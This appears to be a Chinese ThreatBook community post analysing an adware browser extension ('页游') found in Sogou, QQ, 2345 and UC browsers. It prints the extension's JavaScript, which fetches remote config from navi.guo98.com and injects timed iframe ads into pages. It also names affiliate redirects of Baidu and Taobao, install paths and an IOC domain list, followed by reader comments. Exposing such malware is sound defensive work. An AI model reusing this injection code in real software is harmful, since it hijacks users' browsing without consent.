threatBook社区用户名
IOC 5

threatBookthreatBook

其他攻击
国内基于 Chromium 的第三方浏览器恶意扩展
社区用户名
2019-11-09 00:04:03ThreatBook1188
+ 关注

事情的起因是在室友机器上打开自己网站,发现多出两个奇怪的请求。

捕获1.PNG

经过简单查找后发现和某个浏览器扩展有关,扩展的 ID 为 bcllnihhejhaoggcbojnliiombmjlncd:

捕获2.PNG

在搜狗高速浏览器的扩展管理选项卡,看到了它的名字叫“页游”,边上还有一个没有通过搜狗签名的警告,不管怎样它还是启用了。

捕获3.PNG

粗略地看了一下,它主要有两个功能一个是在特定时间段(晚上7:55-8:00)往网页 append 广告内容(http://news.7654.com/newsTpop/):

window.onload = function () {
// 第一时间段
var html = "",timer = null;
function touch(){
$("body").append("<div id='tc'><div id='top'><span class='close' style='font-size: 12px;'>关闭</span></div><div id='my_iframe'></div></div>");

$(".close").click(function () {
$("#tc")[0].style.display = "none";
});
}

function time1(){
$.ajax({
type: "GET",
url: "https://navi.guo98.com/tanchuang/config.json",
data:{},
dataType: "json",
cache:false,
success: function (data) {
time_range1(data.Data[0].beginTime, data.Data[0].endTime);

html += '<iframe src="'+ data.Data[0].url +'" frameborder="0" width="'+ data.Data[0].Width +'" height="'+ data.Data[0].Height +'"></iframe>';
return html;
},
error:function (err) {
console.log(err);
}
});
}
time1();

/**
* 判断当前时间的区间
* @param beginTime
* @param endTime
* @returns {boolean}
*/
function time_range1(beginTime, endTime) {
var strb = beginTime.split(":");
if (strb.length != 2) {
return false;
}

var stre = endTime.split(":");
if (stre.length != 2) {
return false;
}
var b,e,n;

timer = setInterval(function () {
b = new Date();
e = new Date();
n = new Date();

b.setHours(strb[0]);
b.setMinutes(strb[1]);
e.setHours(stre[0]);
e.setMinutes(stre[1]);

if (n.getTime() - b.getTime() > 0 && n.getTime() - e.getTime() < 0) {
touch();
$("#my_iframe").append(html);
clearInterval(timer)
} else {
console.log(1);
}
},1800000);
}
// 第二时间段
var html2 = "",timer2 = null;
function touch2(){
$("body").append("<div id='tt'><div id='top2'><span class='close' style='font-size: 12px;'>关闭</span></div><div id='my_iframe2'></div></div>");

$(".close").click(function () {
$("#tt")[0].style.display = "none";
});
}

function time2(){
$.ajax({
type: "GET",
url: "https://navi.guo98.com/tanchuang/config.json",
data:{},
dataType: "json",
cache:false,
success: function (data) {
time_range2(data.Data[1].beginTime, data.Data[1].endTime);

html2 += '<iframe src="'+ data.Data[1].url +'" frameborder="0" width="'+ data.Data[1].Width +'" height="'+ data.Data[1].Height +'"></iframe>';
return html2;
},
error:function (err) {
console.log(err);
}
});
}
time2();
function time_range2(beginTime, endTime) {
var strb = beginTime.split(":");
if (strb.length != 2) {
return false;
}

var stre = endTime.split(":");
if (stre.length != 2) {
return false;
}
var b,e,n;

timer2 = setInterval(function () {
b = new Date();
e = new Date();
n = new Date();

b.setHours(strb[0]);
b.setMinutes(strb[1]);
e.setHours(stre[0]);
e.setMinutes(stre[1]);

if (n.getTime() - b.getTime() > 0 && n.getTime() - e.getTime() < 0) {
touch2();
$("#my_iframe2").append(html2);
clearInterval(timer2)
} else {
console.log(1);
}
},1800000);
}
}

很可惜,脚本写的有问题,在控制台有报错内容:

捕获.PNG

另外一个功能为将百度淘宝等网站重定向到带有推广号的页面:

捕获6.PNG

中招的不只是搜狗浏览器,还有2345加速浏览器,“海淘一号”和“VIP优惠”显然也不是什么好鸟,请注意那段 Warning:

我的应用.png

来看看我们熟悉的“页游”,再次截图时那段 Warning 没有了,不知道为什么。

捕获5.PNG

以及QQ浏览器:

捕获4.PNG

所涉及的扩展文件路径:

C:\Users\Administrator\AppData\Roaming\SogouExplorer\Extension
C:\Users\Administrator\AppData\Local\UCBrowser\User Data\Default\Extensions
C:\Users\Administrator\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions

写在后面的话:有人说恶意扩展可以去商店举报,很显然这些浏览器扩展并非从商店下载的,它们可能是某款软件安装带来的,可疑对象有“快压”,注入的广告里提到了“快压新闻”(http://news.7654.com/newsTpop/)。这些扩展是被直接释放到上述路径,所涉及的浏览器没有对扩展程序有任何的验证,这成为了这些恶意扩展的温床。这里还是推荐使用 Chromium/Firefox 原厂浏览器,他们有良好的扩展校验。

展开全部ThreatBook

威胁指标(IOC)

域名子域名历史IP样本标签
bustatis.xixixiha.com8000
diert.730851.com5000
ext.config.38675524.com2000
ext.statis.xixixihaha.com3000
navi.guo98.com7000
7

评论

ThreatBook
luolin6888
2020-03-31 23:49:46
threatBook0
广告无处不在
what
2020-03-26 11:36:45
threatBook0
流氓软件真是毒瘤
社区用户名
2020-03-25 21:46:18
threatBook0
呃,只是想解除匿名好奇加了多少积分,结果被排到首页上来了。
bisheng
2020-01-10 16:54:02
threatBook0
脚本写的有错才是最秀的
匿名用户
2019-11-10 14:15:38
threatBook0
这貌似是中了流氓软件,流氓软件带来的广告插件
HenryGe
2019-11-09 08:46:43
threatBook5
恶意扩展可以直接在chrome里面举报
rubikdc
2019-11-09 17:42:37
threatBook
回复@HenryGe这貌似是搜狗...
HenryGe
2019-11-10 07:06:05
threatBook
回复@rubikdc内核是chrome的,插件是通用的。
rsj123
2020-03-27 08:57:41
threatBook
回复@HenryGe这种应该是没上架的插件(
匿名用户
2020-03-31 17:29:36
threatBook
回复@rsj123记得chrome要安装插件是要开启类似权限的。
社区用户名
2019-11-10 15:13:21
threatBook
回复@HenryGe我觉得你没看文章内容。
已经到底了,没有更多内容了